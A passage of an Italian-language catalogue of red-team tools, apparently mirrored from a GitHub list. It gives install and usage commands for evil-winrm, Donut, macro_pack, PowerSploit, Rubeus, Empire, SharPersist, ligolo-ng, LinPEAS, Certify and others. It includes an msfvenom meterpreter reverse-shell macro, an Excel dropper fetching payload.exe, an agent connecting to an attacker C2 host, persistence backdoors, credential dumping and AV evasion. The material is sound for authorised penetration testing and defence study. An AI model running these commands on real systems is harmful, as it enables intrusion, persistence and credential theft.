Istruzioni di installazione alternative possono essere trovate [qui](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods).

**Utilizzo:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll

Full usage documentation can be found here.

image

Immagine usata da https://korbinian-spielvogel.de/posts/heist-writeup/

🔙Donut

Uno strumento per l'esecuzione in memoria di file VBScript, JScript, EXE, DLL e assembly dotNET. Può essere utilizzato per caricare ed eseguire payload personalizzati sui sistemi target senza la necessità di salvare file su disco.

Installazione: (Windows)```bash git clone http://github.com/thewover/donut.git

root@kitploit:~
Per generare il template del loader, la libreria dinamica donut.dll, la libreria statica donut.lib e il generatore donut.exe. Avvia un Prompt dei comandi per sviluppatori di Microsoft Visual Studio x64, passa alla directory in cui hai clonato il repository Donut e inserisci quanto segue:```bash
nmake -f Makefile.msvc

Per fare lo stesso, eccetto utilizzando MinGW-64 su Windows o Linux, spostati nella directory in cui hai clonato il repository Donut e inserisci il seguente:```bash make -f Makefile.mingw

root@kitploit:~
**Installazione: (Linux)**```bash
pip3 install donut-shellcode

Uso:```bash

Creating shellcode from an XSL file that pops up a calculator.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")

Creating shellcode from an unmanaged DLL. Invokes DLLMain.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")

root@kitploit:~
Per informazioni complete sull'uso, consulta la [pagina GitHub](https://github.com/TheWover/donut/#4-usage) di donut.

Vedi [un recente post sul blog](https://thewover.github.io/Bear-Claw/) di The Wover per maggiori informazioni.

![image](https://assets.kitploit.com/production/public/readmes/147/f1dba24c73e1bc864c83173904c6592faee2f8aa854da293767b90d69449d5c4.png)

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)

Uno strumento utilizzato per automatizzare l'offuscamento e la generazione di documenti Office, script VB, collegamenti e altri formati per red teaming.

**Installazione: (Binario)** 

1. Ottieni l'ultimo binario da [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)
2. Scarica il binario su un PC con Microsoft Office autentico installato.
3. Apri la console, esegui cd nella directory del binario e chiama il binario

**Installazione: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

Uso:```bash

Help Page

python3 macro_pack.py --help

List all supported file formats

macro_pack.exe --listformats

Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

Obfuscate Empire stager VBA file and generate a MS Word document:

macro_pack.exe -f empire.vba -o -G myDoc.docm

Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)

echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"

Execute calc.exe via Dynamic Data Exchange (DDE) attack

echo calc.exe | macro_pack.exe --dde -G calc.xslx

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/05a46a14fba117c71b6b79cec0cccbc403531a302add46b9e55035e7d9d634ef.png)

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)

Una raccolta di script e moduli PowerShell che possono essere utilizzati per raggiungere una varietà di obiettivi di red teaming.

Alcune delle funzionalità di PowerSploit:

- Scaricare hash di password ed estrarre password in chiaro dalla memoria
- Elevare i privilegi e bypassare i controlli di sicurezza
- Eseguire codice PowerShell arbitrario e bypassare le restrizioni di esecuzione
- Effettuare ricognizione e scoperta di rete
- Generare payload ed eseguire exploit

**Installazione:** *1. Salva nella cartella dei moduli PowerShell*

Per prima cosa dovrai scaricare la [cartella PowerSploit](https://github.com/PowerShellMafia/PowerSploit) e salvarla nella cartella dei moduli PowerShell.

Il percorso della cartella dei moduli PowerShell può essere trovato con il seguente comando:```
$Env:PSModulePath

Installazione: 2. Installa PowerSploit come modulo PowerShell

Successivamente dovrai installare il modulo PowerSploit (usa il nome della cartella scaricata).

Nota: La tua policy di esecuzione di PowerShell potrebbe bloccarti, per risolvere esegui il seguente comando.``` powershell.exe -ep bypass

root@kitploit:~
Ora puoi installare il modulo PowerSploit.```
Import-Module PowerSploit

Utilizzo:``` Get-Command -Module PowerSploit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/be1d37fac661a710be1a2268f5f0090e13b496c05f8d22b56d47e166072e5fff.png)

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)

Uno strumento che può essere utilizzato per eseguire varie azioni relative agli ambienti Microsoft Active Directory (AD), come il dump degli hash delle password, la creazione/eliminazione di utenti e la modifica delle proprietà degli utenti.

Alcune delle funzionalità di Rubeus:

- Kerberoasting
- Attacchi Golden ticket
- Attacchi Silver ticket

**Installazione: (Scarica)** 

Puoi installare il binario precompilato non ufficiale di Rubeus [qui](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe). 

**Installazione: (Compila)** 

Rubeus è compatibile con [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Apri il [progetto .sln](https://github.com/GhostPack/Rubeus) di Rubeus, scegli "Release" e compila.

**Utilizzo:**```
Rubeus.exe -h

immagine

🔙SharpUp

Un ottimo strumento per verificare la presenza di vulnerabilità su un endpoint vittima relative a processi con privilegi elevati, gruppi, percorsi di hijacking, ecc.

Installazione: (Download)

È possibile installare il binario SharpUp precompilato non ufficiale qui.

Installazione: (Compilazione)

SharpUp è compatibile con Visual Studio 2015 Community Edition. Aprire il progetto SharpUp .sln, selezionare "Release" e compilare.

Utilizzo:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.

SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.

SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/881494f39c898e7951e05d177aeaef111636ae85c7a4c9a607f337e3318f7d77.png)

### [🔙](#elenco-strumenti)[SQLRecon](https://github.com/skahwah/SQLRecon)

MS-SQL (Microsoft SQL Server) è un sistema di gestione di database relazionali sviluppato e commercializzato da Microsoft.

Questo toolkit MS-SQL in C# è progettato per la ricognizione offensiva e il post-sfruttamento. Per informazioni dettagliate sull'uso di ogni tecnica, consulta la [wiki](https://github.com/skahwah/SQLRecon/wiki).

**Installazione: (Binary)** 

Puoi scaricare l'ultima versione binaria da [qui](https://github.com/skahwah/SQLRecon/releases).

**Utilizzo:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami

# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami

# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases

# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019

Full usage information can be found on the wiki.

Tool module usage information can be found here.

image

Immagine presa dalla pagina di aiuto di SQLRecon

🔙UltimateAppLockerByPassList

Questa risorsa è una raccolta delle tecniche più comuni e conosciute per bypassare AppLocker.

Poiché AppLocker può essere configurato in diversi modi, @api0cradle mantiene un elenco verificato di bypass (che funzionano contro le regole predefinite di AppLocker) e un elenco con possibili tecniche di bypass (a seconda della configurazione) o dichiarate come tali da qualcuno.

Hanno anche un elenco di tecniche di bypass generiche, oltre a un elenco legacy di metodi per l'esecuzione tramite DLL.

Elenchi indicizzati

  • Generic-AppLockerbypasses.md
  • VerifiedAppLockerBypasses.md
  • UnverifiedAppLockerBypasses.md
  • DLL-Execution.md

image

Immagine presa da https://github.com/api0cradle/UltimateAppLockerByPassList

🔙StarFighters

Un launcher Empire basato su JavaScript e VBScript, che viene eseguito all'interno del proprio host PowerShell incorporato.

Entrambi i launcher vengono eseguiti all'interno del proprio host PowerShell incorporato, quindi non abbiamo bisogno di PowerShell.exe.

Questo potrebbe essere utile quando un'azienda blocca PowerShell.exe e/o utilizza una soluzione di whitelisting delle applicazioni, ma non blocca l'esecuzione di file JS/VBS.

Utilizzo:

  • Configura un nuovo Listener in PowerShell Empire
  • Usa il comando Launcher per generare un launcher PowerShell per questo listener
  • Copia e sostituisci il Payload Launcher codificato in Base64 all'interno del file JavaScript o VBScript di StarFighter

Per la versione JavaScript, utilizza la seguente variabile:```javascript var EncodedPayload = ""

root@kitploit:~
Per la versione VBScript utilizzare la seguente variabile:```vbscript
  Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"
  • Quindi esegui: wscript.exe StarFighter.js o StarFighter.vbs sul target, oppure fai doppio clic sui launcher all'interno di Explorer.

image

Immagine presa da https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html

🔙demiguise

L'obiettivo di questo progetto è generare file .html che contengono un file HTA crittografato.

L'idea è che quando il tuo target visita la pagina, la chiave viene recuperata e l'HTA viene decriptato dinamicamente all'interno del browser e inviato direttamente all'utente.

Questa è una tecnica di evasione per aggirare l'ispezione del contenuto/tipo di file implementata da alcuni dispositivi di sicurezza.

Ulteriori informazioni tecniche qui.

Installazione:``` git clone https://github.com/nccgroup/demiguise cd demiguise

root@kitploit:~
**Utilizzo:**```bash
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

image

Immagine utilizzata da https://github.com/nccgroup/demiguise

🔙PowerZure

PowerZure è un progetto PowerShell creato per valutare e sfruttare le risorse all'interno della piattaforma cloud di Microsoft, Azure. PowerZure è stato creato dalla necessità di un framework che possa sia eseguire ricognizione che sfruttamento di Azure, AzureAD e delle risorse associate.

Non c'è alcuna ragione per eseguire PowerZure su una macchina vittima. L'autenticazione viene effettuata utilizzando un file accesstoken.json esistente o effettuando il login tramite prompt quando si accede ad Azure, il che significa che puoi utilizzare in sicurezza PowerZure per interagire con l'istanza cloud di una vittima dalla tua macchina operativa.

Installazione:```bash Install-Module -Name Az git clone https://github.com/hausec/PowerZure cd PowerZure ipmo C:\path\to\PowerZure.psd1

root@kitploit:~
**Utilizzo:**```bash
# Get a list of AzureAD and Azure objects you have access to
Get-AzureTarget

Blog - Attaccare Azure, Azure AD, e Introduzione a PowerZure

image

Immagine utilizzata da https://hakin9.org

Persistenza

🔙Impacket

Impacket fornisce una serie di binding Python di basso livello per vari protocolli di rete, tra cui SMB, Kerberos e LDAP, oltre a librerie di alto livello per interagire con i servizi di rete e svolgere attività specifiche come il dump degli hash delle password e la creazione di condivisioni di rete.

Include anche una serie di strumenti da riga di comando che possono essere utilizzati per eseguire varie attività come il dump dei database SAM, l'enumerazione delle trust di dominio e il cracking delle password di Windows.

Installazione:```bash python3 -m pip install impacket

root@kitploit:~
**Installazione: (Con Script di Esempio)** 

Scarica ed estrai [il pacchetto](https://github.com/fortra/impacket), poi naviga alla cartella di installazione ed esegui...```bash
python3 -m pip install .

Utilizzo:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

Gets a list of the sessions opened at the remote hosts

netview.py domain/user:password -target 192.168.10.2

Retrieves the MSSQL instances names from the target host.

mssqlinstance.py 192.168.1.2

This script will gather data about the domain's users and their corresponding email addresses.

GetADUsers.py domain/user:password@IP

root@kitploit:~
Great [cheat sheet](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) per l'uso di Impacket.

![image](https://assets.kitploit.com/production/public/readmes/147/2be6291c92daeeea07d0afe27bcf2ecde2bd9676d07e84e8b7c6ee823887e902.png)

### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)

Empire è un framework di post-exploitation che consente di generare payload per stabilire connessioni remote con sistemi vittima.

Una volta che un payload è stato eseguito su un sistema vittima, stabilisce una connessione di ritorno al server Empire, che può quindi essere utilizzato per inviare comandi e controllare il sistema target.

Empire include anche una serie di moduli e script integrati che possono essere utilizzati per eseguire attività specifiche, come il dump degli hash delle password, l'accesso al registro di Windows e l'esfiltrazione di dati.

**Installazione:**```bash
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh

Utilizzo:```bash

Start Empire

./empire

List live agents

list agents

List live listeners

list listeners

root@kitploit:~
Ottimo utilizzo [cheat sheet](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf) di [HarmJoy](https://github.com/HarmJ0y).

![image](https://assets.kitploit.com/production/public/readmes/147/3dec2ca6692f2b6431159a32830e854fa994824b8bcf12c797c0bda8a186519d.png)

### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)

Un toolkit di persistenza per Windows scritto in C#.

Il progetto ha un [wiki](https://github.com/mandiant/SharPersist/wiki).

**Installazione: (Binario)**

Puoi trovare l'ultima release [qui](https://github.com/mandiant/SharPersist/releases).

**Installazione: (Compilazione)**

- Scarica i file del progetto dal [Repository GitHub](https://github.com/mandiant/SharPersist).
- Carica il progetto in Visual Studio e vai su "Strumenti" --> "Gestione pacchetti NuGet" --> "Impostazioni gestione pacchetti"
- Vai su "Gestione pacchetti NuGet" --> "Origini pacchetti"
- Aggiungi un'origine pacchetto con URL "https://api.nuget.org/v3/index.json"
- Installa il pacchetto NuGet Costura.Fody. È necessaria la versione precedente di Costura.Fody (3.3.3), in modo da non aver bisogno di Visual Studio 2019.
	- `Install-Package Costura.Fody -Version 3.3.3`
- Installa il pacchetto TaskScheduler
	- `Install-Package TaskScheduler -Version 2.8.11`
- Ora puoi compilare il progetto da solo!

**Utilizzo:**

Un elenco completo di esempi di utilizzo può essere trovato [qui](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add).```
#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add 

#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

image

🔙ligolo-ng

Ligolo-ng è uno strumento semplice, leggero e veloce che consente ai penetration tester di stabilire tunnel da una connessione TCP/TLS inversa utilizzando un'interfaccia tun (senza la necessità di SOCKS).

Invece di utilizzare un proxy SOCKS o inoltri TCP/UDP, Ligolo-ng crea uno stack di rete in spazio utente utilizzando Gvisor.

Quando si esegue il server relay/proxy, viene utilizzata un'interfaccia tun; i pacchetti inviati a questa interfaccia vengono tradotti e quindi trasmessi alla rete remota dell'agente.

Installazione: (Download)

I binari precompilati (Windows/Linux/macOS) sono disponibili nella pagina delle release.

Installazione: (Build)

Compilazione di ligolo-ng (richiesto Go >= 1.17):```bash go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go

Build for Windows

GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go

root@kitploit:~
**Configurazione: (Linux)**```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

Configurazione: (Windows)

Devi scaricare il driver Wintun (usato da WireGuard) e posizionare il file wintun.dll nella stessa cartella di Ligolo (assicurati di utilizzare l'architettura corretta).

Configurazione: (Server proxy)```bash ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates

root@kitploit:~
**Utilizzo:**

*Avvia l'agente sul computer di destinazione (vittima) (non sono richiesti privilegi!):*```bash
./agent -connect attacker_c2_server.com:11601

Una sessione dovrebbe apparire sul server proxy.``` INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

root@kitploit:~
Usa il comando session per selezionare l'agente.```
ligolo-ng » session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Le informazioni complete sull'utilizzo sono disponibili qui.

image

Immagine tratta da https://github.com/nicocha30/ligolo-ng#demo

Escalation dei Privilegi

🔙Crassus

"Accenture ha creato un tool chiamato Spartacus, che trova opportunità di DLL hijacking su Windows. Usando Spartacus come punto di partenza, abbiamo creato Crassus per estendere le capacità di individuare escalation dei privilegi su Windows oltre la semplice ricerca di file mancanti. Gli ACL utilizzati da file e directory di processi con privilegi possono trovare più di quanto si possa ottenere cercando solo file mancanti per raggiungere l'obiettivo." - Link

Installazione: (Build)

Crassus è stato sviluppato come progetto di Visual Studio 2019. Per compilare Crassus.exe:

  1. Aprire Crassus.sln
  2. Premere Ctrl+Shift+B sulla tastiera

Installazione: (precompilato)

Se vi fidate ad eseguire codice di altri senza sapere cosa faccia, Crassus.exe è fornito in questo repository.

Utilizzo:

  1. In Process Monitor, selezionare l'opzione Enable Boot Logging.
  2. Riavviare.
  3. Dopo aver effettuato l'accesso e dopo che Windows si è stabilizzato, facoltativamente eseguire anche attività pianificate che potrebbero essere configurate per essere eseguite con privilegi.
  4. Eseguire nuovamente Process Monitor.
  5. Quando richiesto, salvare il boot log.
  6. Reimpostare il filtro predefinito di Process Monitor usando Ctrl-R.
  7. Salvare questo file di log, ad esempio, in boot.PML. Il motivo per salvare nuovamente il file di log è duplice:
    1. Le versioni precedenti di Process Monitor non salvano i boot log come un unico file.
    2. I boot log per impostazione predefinita non sono filtrati, il che potrebbe contenere rumore aggiuntivo, come un DLL hijacking da parte dell'utente locale durante l'avvio dello stesso Process Monitor.

Crassus

Immagine tratta da https://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots

🔙LinPEAS

LinPEAS è un ottimo tool verboso per l'escalation dei privilegi, utilizzato per trovare percorsi di privilege escalation locali su endpoint Linux.

Installazione + Utilizzo:```bash curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/75977a81eeb607a2ef06b8524e1792579aa3dc5b245596ee7eeed5938d75f279.png)

### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)

WinPEAS è un utile tool verboso per l'escalation dei privilegi, progettato per trovare percorsi di privesc locali su endpoint Windows.

**Installazione + Utilizzo:**```bash
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

image

🔙linux-smart-enumeration

Linux smart enumeration è un altro buon strumento privesc per Linux, meno verboso.

Installazione + Utilizzo:```bash curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/0d46a6a3c94f9ce73617ebb098962e9d6d630489e557e57adba93bd24d562808.png)

### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify)

Certify è uno strumento C# per enumerare e abusare delle configurazioni errate nei Servizi Certificati di Active Directory (AD CS).

Certify è progettato per essere utilizzato insieme ad altri strumenti e tecniche del red team, come Mimikatz e PowerShell, per consentire ai red teamer di eseguire vari tipi di attacchi, inclusi attacchi man-in-the-middle, attacchi di impersonificazione e attacchi di escalation dei privilegi.

**Caratteristiche principali di Certify:**
 
- Creazione di certificati
- Firma di certificati
- Importazione di certificati
- Modifica della fiducia dei certificati

**Installazione: (Compilazione)** 

Certify è compatibile con [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Apri il progetto Certify [.sln](https://github.com/GhostPack/Certify), scegli "Release" e compila.

**Installazione: (Esecuzione di Certify tramite PowerShell)** 

Se desideri eseguire Certify in memoria tramite un wrapper PowerShell, prima compila Certify e codifica in base64 l'assembly risultante:```bash
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt

Certify può quindi essere caricato in uno script PowerShell con il seguente (dove "aa..." viene sostituito con la stringa dell'assembly di Certify codificata in base64):``` $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

root@kitploit:~
Il metodo Main() e qualsiasi argomento possono quindi essere invocati come segue:```
[Certify.Program]::Main("find /vulnerable".Split())

Le istruzioni complete per la compilazione si trovano qui.

Utilizzo:```bash

See if there are any vulnerable templates

Certify.exe find /vulnerable

Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal

Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin

root@kitploit:~
Full example walkthrough can be found [here](https://github.com/GhostPack/Certify#example-walkthrough).

![image](https://assets.kitploit.com/production/public/readmes/147/d984105311fed30083e84cdfaa7b63d2f22b85f5dbb448a7162e102241203e1f.png)

### [🔙](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)

Get-GPPPassword è uno script PowerShell parte del toolkit PowerSploit, progettato per recuperare le password per gli account locali che vengono creati e gestiti utilizzando le preferenze dei criteri di gruppo (GPP).

Get-GPPPassword funziona cercando nella cartella SYSVOL sul controller di dominio eventuali file GPP che contengono informazioni sulle password. Una volta trovati questi file, decripta le informazioni delle password e le mostra all'utente.

**Installazione:** 

Segui le [istruzioni di installazione](https://github.com/A-poc/RedTeam-Tools#powersploit) di PowerSploit da questo foglio degli strumenti.```bash
powershell.exe -ep bypass
Import-Module PowerSploit

Utilizzo:```bash

Get all passwords with additional information

Get-GPPPassword

Get list of all passwords

Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/2274ad1205f7c6b2db0c3511427e21868bb0d4ba5e2bad1171156819ce417662.png)

### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock)

Script PowerShell per trovare rapidamente patch software mancanti per vulnerabilità di escalation dei privilegi locali.

*Supporta:*

- MS10-015 : User Mode to Ring (KiTrap0D)
- MS10-092 : Task Scheduler
- MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
- MS13-081 : TrackPopupMenuEx Win32k NULL Page
- MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : Font Driver Buffer Overflow
- MS16-016 : 'mrxdav.sys' WebDAV
- MS16-032 : Secondary Logon Handle
- MS16-034 : Windows Kernel-Mode Drivers EoP
- MS16-135 : Win32k Elevation of Privilege
- CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc

**Install: (PowerShell)**```bash
# Git install
git clone https://github.com/rasta-mouse/Sherlock

# Load powershell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1

Utilizzo: (PowerShell)```bash

Run all functions

Find-AllVulns

Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)

Find-MS14058

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/0a46401aa0ece2211b30e76a9d2138453ec5f98cfb69416a2607084c10612993.png)

*Immagine usata da https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/*

### [🔙](#tool-list)[Watson](https://github.com/rasta-mouse/Watson)

Watson è uno strumento .NET progettato per enumerare i KB mancanti e suggerire exploit per vulnerabilità di Privilege Escalation.

Ottimo per identificare patch mancanti e suggerire exploit che potrebbero essere utilizzati per sfruttare vulnerabilità note al fine di ottenere privilegi più elevati sul sistema.

**Installazione:** 

Utilizzando [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Aprire il [progetto Watson .sln](https://github.com/rasta-mouse/Watson), scegliere "Release" e compilare.

**Utilizzo:**```bash
# Run all checks
Watson.exe

image

Testo dell'immagine tratto da https://github.com/rasta-mouse/Watson#usage

🔙ImpulsiveDLLHijack

Uno strumento basato su C# che automatizza il processo di scoperta e sfruttamento dei DLL Hijack nei binari target.

I percorsi di hijack scoperti possono essere weaponizzati, durante un engagement, per eludere gli EDR.

Installazione:

  • Procmon.exe -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
  • DLL di conferma personalizzate :
    • Questi sono file DLL che aiutano lo strumento a ottenere la conferma che le DLL siano state caricate con successo dal percorso di hijack identificato
    • Compilati dal progetto MalDLL fornito sopra (o usa i binari precompilati se ti fidi di me!)
    • Il nome della DLL a 32 bit dovrebbe essere: maldll32.dll
    • Il nome della DLL a 64 bit dovrebbe essere: maldll64.dll
    • Installa il pacchetto NuGet: PeNet -> https://www.nuget.org/packages/PeNet/ (Prerequisito durante la compilazione del progetto ImpulsiveDLLHijack)

Nota: i prerequisiti i e ii devono essere posizionati nella directory stessa di ImpulsiveDLLHijack.exe.

  • Informazioni sulla compilazione e configurazione:

    • ImpulsiveDLLHijack

      • Clonare il repository in Visual Studio
      • Una volta che il progetto è caricato in Visual Studio, vai su "Project" --> "Manage NuGet packages" --> Cerca i pacchetti e installa "PeNet" -> https://www.nuget.org/packages/PeNet/
      • Compila il progetto!
      • Il file ImpulsiveDLLHijack.exe sarà all'interno della directory bin.
    • E per le DLL di conferma:

      • Clonare il repository in Visual Studio
      • Compilare il progetto con x86 e x64
      • Rinominare il rilascio x86 come maldll32.dll e il rilascio x64 come maldll64.dll
    • Configurazione: Copiare le DLL di conferma (maldll32 e maldll64) nella directory di ImpulsiveDLLHijack.exe ed eseguire ImpulsiveDLLHijack.exe :))

Istruzioni di installazione da https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites

Utilizzo:```bash

Help

ImpulsiveDLLHijack.exe -h

Look for vulnerabilities in an executable

ImpulsiveDLLHijack.exe -path BINARY_PATH

root@kitploit:~
Esempi di utilizzo possono essere trovati [qui](https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples).

![image](https://assets.kitploit.com/production/public/readmes/147/acedd276f532d4b77d4a5f9d0d93f9d926ba6b0afd1da582b94410c32eb47ea1.png)

*Immagine tratta da https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples*

### [🔙](#tool-list)[ADFSDump](https://github.com/mandiant/ADFSDump)

Uno strumento in C# per estrarre ogni genere di dati utili da AD FS.

Creato da Doug Bienstock [@doughsec](https://twitter.com/doughsec) mentre era in Mandiant FireEye.

Questo strumento è progettato per essere eseguito insieme a ADFSpoof. ADFSdump restituirà tutte le informazioni necessarie per generare token di sicurezza utilizzando ADFSpoof.

**Requisiti:**

- ADFSDump deve essere eseguito nel contesto utente dell'account di servizio di AD FS. Puoi ottenere queste informazioni elencando i processi in esecuzione sul server AD FS o dal risultato del cmdlet Get-ADFSProperties. Solo l'account di servizio di AD FS ha le autorizzazioni necessarie per accedere al database di configurazione. Nemmeno un amministratore di dominio può accedervi.
- ADFSDump presuppone che il servizio sia configurato per utilizzare il database interno di Windows (WID). Sebbene sarebbe banale supportare un server SQL esterno, questa funzionalità al momento non esiste.
- ADFSDump deve essere eseguito localmente su un server AD FS, NON su un proxy applicazione Web di AD FS. Il WID può essere accessibile solo localmente tramite una named pipe.

**Installazione: (Compilazione)**

ADFSDump è stato compilato su .NET 4.5 con Visual Studio 2017 Community Edition. Basta aprire il file .sln del progetto, scegliere "Release" e compilare.

**Utilizzo: (Flag)**```bash
# The Active Directory domain to target. Defaults to the current domain.
/domain:

# The Domain Controller to target. Defaults to the current DC.
/server:

# Switch. Toggle to disable outputting the DKM key.
/nokey

# (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.
/database

Blog - Esplorando l'attacco Golden SAML contro ADFS

immagine

Immagine utilizzata da https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs

🔙BeRoot

BeRoot Project è uno strumento di post-exploitation per verificare configurazioni errate comuni al fine di trovare un modo per elevare i nostri privilegi.

L'obiettivo di BeRoot è di produrre solo potenziali opportunità di elevazione dei privilegi e non una valutazione della configurazione degli endpoint.

Questo progetto funziona su Windows, Linux e Mac OS.

Installazione: (Linux)```bash git clone https://github.com/AlessandroZ/BeRoot cd BeRoot/Linux/

root@kitploit:~
**Install: (Windows)** 

Una versione precompilata di BeRoot può essere trovata [qui](https://github.com/AlessandroZ/BeRoot/releases).

**Utilizzo:**```bash
# Run BeRoot
python beroot.py

# Run BeRoot with user password (If you know the password use it, you could get more results)
python beroot.py --password super_strong_password

Ulteriori informazioni sono disponibili qui per:

  • Linux
  • Windows

image

Immagine usata da https://github.com/AlessandroZ/BeRoot

Evasione della difesa

🔙Invoke-Obfuscation

Un obfuscatore di comandi e script PowerShell compatibile con PowerShell v2.0+. Se un endpoint vittima è in grado di eseguire PowerShell, questo strumento è ottimo per creare script pesantemente offuscati.

Installazione:```bash git clone https://github.com/danielbohannon/Invoke-Obfuscation.git

root@kitploit:~
**Utilizzo:**```bash
./Invoke-Obfuscation

image

🔙Veil

Veil è uno strumento per generare payload metasploit che aggirano le comuni soluzioni antivirus.

Può essere utilizzato per generare shellcode offuscato; per maggiori informazioni, consulta il blog ufficiale di veil framework.

Installazione: (Kali)```bash apt -y install veil /usr/share/veil/config/setup.sh --force --silent

root@kitploit:~
**Installazione: (Git)**```bash
